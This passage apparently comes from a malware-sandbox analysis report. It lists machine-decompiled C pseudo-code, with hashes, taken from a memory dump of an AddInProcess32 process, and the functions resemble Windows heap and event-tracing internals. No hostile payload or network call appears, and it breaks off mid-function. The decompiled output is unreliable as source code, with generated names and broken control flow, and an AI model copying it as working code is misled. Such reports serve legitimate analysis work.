                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec00b7f3897b3a2cfc62e86737317799d9d3f7a167fab64acacd580170c7bfe1
                              • Instruction ID: 4d357497820d9fe9405ce633e343f83c7e742ff30e74ca8349490663f53ff753
                              • Opcode Fuzzy Hash: ec00b7f3897b3a2cfc62e86737317799d9d3f7a167fab64acacd580170c7bfe1
                              • Instruction Fuzzy Hash: 47111E70E002599FDB04DFA9D441FAEBBF4FF08300F0442AAE518EB381E6349A40CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0185DB60(signed int __ecx) {
                              				intOrPtr* _t9;
                              				void* _t12;
                              				void* _t13;
                              				intOrPtr _t14;
                              
                              				_t9 = __ecx;
                              				_t14 = 0;
                              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                              					_t13 = 0xc000000d;
                              				} else {
                              					_t14 = E0185DB40();
                              					if(_t14 == 0) {
                              						_t13 = 0xc0000017;
                              					} else {
                              						_t13 = E0185E7B0(__ecx, _t12, _t14, 0xfff);
                              						if(_t13 < 0) {
                              							L0185E8B0(__ecx, _t14, 0xfff);
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                              							_t14 = 0;
                              						} else {
                              							_t13 = 0;
                              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                              						}
                              					}
                              				}
                              				 *_t9 = _t14;
                              				return _t13;
                              			}








                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                              • Instruction ID: 2dfba4b928c1e854af63995f886ba1ff8464845fbe15436371ad60b8a794cf2f
                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                              • Instruction Fuzzy Hash: F9F0C8332015239BD3725ADD4884B67BAABCF91BA1F150135BE05DB344C9608A0286D3
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0185B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                              				signed char* _t13;
                              				intOrPtr _t22;
                              				char _t23;
                              
                              				_t23 = __edx;
                              				_t22 = __ecx;
                              				if(E01877D50() != 0) {
                              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                              				} else {
                              					_t13 = 0x7ffe0384;
                              				}
                              				if( *_t13 != 0) {
                              					_t13 =  *[fs:0x30];
                              					if((_t13[0x240] & 0x00000004) == 0) {
                              						goto L3;
                              					}
                              					if(E01877D50() == 0) {
                              						_t13 = 0x7ffe0385;
                              					} else {
                              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                              					}
                              					if(( *_t13 & 0x00000020) == 0) {
                              						goto L3;
                              					}
                              					return E018D7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                              				} else {
                              					L3:
                              					return _t13;
                              				}
                              			}







                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                              • Instruction ID: 259365518aad493ccec9ee4aeb9643f82801fb88ca9a7f196c3cd3c1da05cf5f
                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                              • Instruction Fuzzy Hash: C301F932200684DBD322975DC848FA97F99EF51754F080061FE15CB7B2D774CA00C325
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E018EFE87(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				signed int _v24;
                              				intOrPtr _v28;
                              				short _v54;
                              				char _v60;
                              				signed char* _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t32;
                              				intOrPtr _t33;
                              				intOrPtr _t34;
                              				signed int _t35;
                              
                              				_v8 =  *0x194d360 ^ _t35;
                              				_v16 = __ecx;
                              				_v54 = 0x1722;
                              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                              				_v28 =  *((intOrPtr*)(__ecx + 4));
                              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                              				if(E01877D50() == 0) {
                              					_t21 = 0x7ffe0382;
                              				} else {
                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                              				}
                              				_push( &_v60);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t21 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}

















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b10f04b4debb3e5060d112fd4ccd9f4dee0603409f773a3efc0a7b7a5e55cd9e
                              • Instruction ID: 35800b7b074fbd768eb34b5ede4e45bdb99aa62962b3bbda1eb8697e449bbef8
                              • Opcode Fuzzy Hash: b10f04b4debb3e5060d112fd4ccd9f4dee0603409f773a3efc0a7b7a5e55cd9e
                              • Instruction Fuzzy Hash: 92016270A0020DAFCB14DFACD545A6EBBF4EF14704F144159A504EB382D635EA01CB81
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 90%
                              			E01886B90(void* __ecx, intOrPtr* _a4) {
                              				signed int _v8;
                              				signed int _t11;
                              				signed int _t12;
                              				intOrPtr _t19;
                              				void* _t20;
                              				intOrPtr* _t21;
                              
                              				_t21 = _a4;
                              				_t19 =  *_t21;
                              				if(_t19 != 0) {
                              					if(_t19 < 0x1fff) {
                              						_t19 = _t19 + _t19;
                              					}
                              					L3:
                              					 *_t21 = _t19;
                              					asm("rdtsc");
                              					_v8 = 0;
                              					_t12 = _t11 & _t19 - 0x00000001;
                              					_t20 = _t19 + _t12;
                              					if(_t20 == 0) {
                              						L5:
                              						return _t12;
                              					} else {
                              						goto L4;
                              					}
                              					do {
                              						L4:
                              						asm("pause");
                              						_t12 = _v8 + 1;
                              						_v8 = _t12;
                              					} while (_t12 < _t20);
                              					goto L5;
                              				}
                              				_t12 =  *( *[fs:0x18] + 0x30);
                              				if( *((intOrPtr*)(_t12 + 0x64)) == 1) {
                              					goto L5;
                              				}
                              				_t19 = 0x40;
                              				goto L3;
                              			}










                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                              • Instruction ID: ae1ff48293d9c6f7b6987a42f4fd1fc3ac08e36d5c25a49c1fbc09bd7ef6738e
                              • Opcode Fuzzy Hash: 81643371c3d383621713f4ac5897031efe5d79de90dbf9db909a2b6cb50fdbef
                              • Instruction Fuzzy Hash: 7BF04975A00248DFDB18DE48C690AACBBB1FB44318F2844A8E606DB701E6399F00DB40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 48%
                              			E0191131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				short _v50;
                              				char _v56;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_v8 =  *0x194d360 ^ _t32;
                              				_v20 = _a4;
                              				_v12 = _a8;
                              				_v24 = __ecx;
                              				_v16 = __edx;
                              				_v50 = 0x1021;
                              				if(E01877D50() == 0) {
                              					_t18 = 0x7ffe0380;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              				}
                              				_push( &_v56);
                              				_push(0x10);
                              				_push(0x20402);
                              				_push( *_t18 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                              			}
















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 15073043c73de1b558e46a328255a6a0e5e36605c1f0f38addd35ccb2e72a3a2
                              • Instruction ID: b4f2b390ebc8c3bcd21a0509abac04a26fc3155e8b2363a42ae22279aa9e2675
                              • Opcode Fuzzy Hash: 15073043c73de1b558e46a328255a6a0e5e36605c1f0f38addd35ccb2e72a3a2
                              • Instruction Fuzzy Hash: C0011975A0124DAFCB04EFA9D545AAEBBF4EF18700F404069B905EB385E634AB40CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 48%
                              			E01928F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				intOrPtr _v24;
                              				short _v50;
                              				char _v56;
                              				signed char* _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				signed int _t32;
                              
                              				_t29 = __edx;
                              				_v8 =  *0x194d360 ^ _t32;
                              				_v16 = __ecx;
                              				_v50 = 0x1c2c;
                              				_v24 = _a4;
                              				_v20 = _a8;
                              				_v12 = __edx;
                              				if(E01877D50() == 0) {
                              					_t18 = 0x7ffe0386;
                              				} else {
                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v56);
                              				_push(0x10);
                              				_push(0x402);
                              				_push( *_t18 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                              			}
















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 73ea44f5927237a359aca7dc517d88c8f985b3576b0456e3e6de087668762339
                              • Instruction ID: fdf69ea250fb6e7762b9585ec7e0ade8e8a2dd45ed154cbe9848b04c5b878448
                              • Opcode Fuzzy Hash: 73ea44f5927237a359aca7dc517d88c8f985b3576b0456e3e6de087668762339
                              • Instruction Fuzzy Hash: 35013C74A01209AFDB04EFA8D545EAEBBF8EF18300F104459F905EB380EA34EA00CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 46%
                              			E01911608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				intOrPtr _v20;
                              				short _v46;
                              				char _v52;
                              				signed char* _t15;
                              				intOrPtr _t21;
                              				intOrPtr _t27;
                              				intOrPtr _t28;
                              				signed int _t29;
                              
                              				_t26 = __edx;
                              				_v8 =  *0x194d360 ^ _t29;
                              				_v12 = _a4;
                              				_v20 = __ecx;
                              				_v16 = __edx;
                              				_v46 = 0x1024;
                              				if(E01877D50() == 0) {
                              					_t15 = 0x7ffe0380;
                              				} else {
                              					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                              				}
                              				_push( &_v52);
                              				_push(0xc);
                              				_push(0x20402);
                              				_push( *_t15 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                              			}















                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 36d96690a4c615f07b202fedb9af48580b2ac078674eea64b4a73e31f703de12
                              • Instruction ID: c6a9dbe1e487cc707a00032046b0ace9644e97fd8a569ce1140da7f4ba3729bf
                              • Opcode Fuzzy Hash: 36d96690a4c615f07b202fedb9af48580b2ac078674eea64b4a73e31f703de12
                              • Instruction Fuzzy Hash: 0CF04F71A05248AFDB14DFA8D405E6EBBF4EF14300F044469A905EB281E6349A00CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0187C577(void* __ecx, char _a4) {
                              				void* __esi;
                              				void* __ebp;
                              				void* _t17;
                              				void* _t19;
                              				void* _t20;
                              				void* _t21;
                              
                              				_t18 = __ecx;
                              				_t21 = __ecx;
                              				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0187C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x18311cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					__eflags = _a4;
                              					if(__eflags != 0) {
                              						L10:
                              						E019288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                              						L9:
                              						return 0;
                              					}
                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                              					if(__eflags == 0) {
                              						goto L10;
                              					}
                              					goto L9;
                              				} else {
                              					return 1;
                              				}
                              			}










                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E01912073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                              				void* __esi;
                              				signed char _t3;
                              				signed char _t7;
                              				void* _t19;
                              
                              				_t17 = __ecx;
                              				_t3 = E0190FD22(__ecx);
                              				_t19 =  *0x194849c - _t3; // 0x0
                              				if(_t19 == 0) {
                              					__eflags = _t17 -  *0x1948748; // 0x0
                              					if(__eflags <= 0) {
                              						E01911C06();
                              						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                              						__eflags = _t3;
                              						if(_t3 != 0) {
                              							L5:
                              							__eflags =  *0x1948724 & 0x00000004;
                              							if(( *0x1948724 & 0x00000004) == 0) {
                              								asm("int3");
                              								return _t3;
                              							}
                              						} else {
                              							_t3 =  *0x7ffe02d4 & 0x00000003;
                              							__eflags = _t3 - 3;
                              							if(_t3 == 3) {
                              								goto L5;
                              							}
                              						}
                              					}
                              					return _t3;
                              				} else {
                              					_t7 =  *0x1948724; // 0x0
                              					return E01908DF1(__ebx, 0xc0000374, 0x1945890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                              				}
                              			}








                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 54%
                              			E0189927A(void* __ecx) {
                              				signed int _t11;
                              				void* _t14;
                              
                              				_t11 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                              				if(_t11 != 0) {
                              					E0189FA60(_t11, 0, 0x98);
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					asm("movsd");
                              					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                              					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                              					E018992C6(_t11, _t14);
                              				}
                              				return _t11;
                              			}






                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 43%
                              			E01928D34(intOrPtr __ecx, intOrPtr __edx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				intOrPtr _v16;
                              				short _v42;
                              				char _v48;
                              				signed char* _t12;
                              				intOrPtr _t18;
                              				intOrPtr _t24;
                              				intOrPtr _t25;
                              				signed int _t26;
                              
                              				_t23 = __edx;
                              				_v8 =  *0x194d360 ^ _t26;
                              				_v16 = __ecx;
                              				_v42 = 0x1c2b;
                              				_v12 = __edx;
                              				if(E01877D50() == 0) {
                              					_t12 = 0x7ffe0386;
                              				} else {
                              					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v48);
                              				_push(8);
                              				_push(0x20402);
                              				_push( *_t12 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                              			}














                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 36%
                              			E01928B58(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				short _v46;
                              				char _v52;
                              				signed char* _t11;
                              				intOrPtr _t17;
                              				intOrPtr _t22;
                              				intOrPtr _t23;
                              				intOrPtr _t24;
                              				signed int _t25;
                              
                              				_v8 =  *0x194d360 ^ _t25;
                              				_v20 = __ecx;
                              				_v46 = 0x1c26;
                              				if(E01877D50() == 0) {
                              					_t11 = 0x7ffe0386;
                              				} else {
                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v52);
                              				_push(4);
                              				_push(0x402);
                              				_push( *_t11 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                              			}














                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 36%
                              			E01928CD6(intOrPtr __ecx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				short _v38;
                              				char _v44;
                              				signed char* _t11;
                              				intOrPtr _t17;
                              				intOrPtr _t22;
                              				intOrPtr _t23;
                              				intOrPtr _t24;
                              				signed int _t25;
                              
                              				_v8 =  *0x194d360 ^ _t25;
                              				_v12 = __ecx;
                              				_v38 = 0x1c2d;
                              				if(E01877D50() == 0) {
                              					_t11 = 0x7ffe0386;
                              				} else {
                              					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              				}
                              				_push( &_v44);
                              				_push(0xffffffe4);
                              				_push(0x402);
                              				_push( *_t11 & 0x000000ff);
                              				return E0189B640(E01899AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                              			}














                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E0187746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                              				signed int _t8;
                              				void* _t10;
                              				short* _t17;
                              				void* _t19;
                              				intOrPtr _t20;
                              				void* _t21;
                              
                              				_t20 = __esi;
                              				_t19 = __edi;
                              				_t17 = __ebx;
                              				if( *((char*)(_t21 - 0x25)) != 0) {
                              					if(__ecx == 0) {
                              						E0186EB70(__ecx, 0x19479a0);
                              					} else {
                              						asm("lock xadd [ecx], eax");
                              						if((_t8 | 0xffffffff) == 0) {
                              							_push( *((intOrPtr*)(__ecx + 4)));
                              							E018995D0();
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                              							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                              							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                              						}
                              					}
                              					L10:
                              				}
                              				_t10 = _t19 + _t19;
                              				if(_t20 >= _t10) {
                              					if(_t19 != 0) {
                              						 *_t17 = 0;
                              						return 0;
                              					}
                              				}
                              				return _t10;
                              				goto L10;
                              			}










                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E01854F2E(void* __ecx, char _a4) {
                              				void* __esi;
                              				void* __ebp;
                              				void* _t17;
                              				void* _t19;
                              				void* _t20;
                              				void* _t21;
                              
                              				_t18 = __ecx;
                              				_t21 = __ecx;
                              				if(__ecx == 0) {
                              					L6:
                              					__eflags = _a4;
                              					if(__eflags != 0) {
                              						L8:
                              						E019288F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                              						L9:
                              						return 0;
                              					}
                              					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                              					if(__eflags != 0) {
                              						goto L9;
                              					}
                              					goto L8;
                              				}
                              				_t18 = __ecx + 0x30;
                              				if(E0187C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1831030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                              					goto L6;
                              				} else {
                              					return 1;
                              				}
                              			}










                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0188A44B(signed int __ecx) {
                              				intOrPtr _t13;
                              				signed int _t15;
                              				signed int* _t16;
                              				signed int* _t17;
                              
                              				_t13 =  *0x1947b9c; // 0x0
                              				_t15 = __ecx;
                              				_t16 = L01874620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                              				if(_t16 == 0) {
                              					return 0;
                              				}
                              				 *_t16 = _t15;
                              				_t17 =  &(_t16[2]);
                              				E0189FA60(_t17, 0, _t15 << 2);
                              				return _t17;
                              			}








                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 79%
                              			E0185F358(void* __ecx, signed int __edx) {
                              				char _v8;
                              				signed int _t9;
                              				void* _t20;
                              
                              				_push(__ecx);
                              				_t9 = 2;
                              				_t20 = 0;
                              				if(E0188F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                              					_t20 = L01874620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                              				}
                              				return _t20;
                              			}







                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                              • Instruction ID: db51eaafbe0e95842516d9a8f1bb892796a5794b5740a9090fd4c2f65c96bcd1
                              • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                              • Instruction Fuzzy Hash: 46E0DF32A42118FBEB61AADD9E05FAABFACDB58B60F000195BF04D7151D5609F40C2D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0186FF60(intOrPtr _a4) {
                              				void* __ecx;
                              				void* __ebp;
                              				void* _t13;
                              				intOrPtr _t14;
                              				void* _t15;
                              				void* _t16;
                              				void* _t17;
                              
                              				_t14 = _a4;
                              				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x18311a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
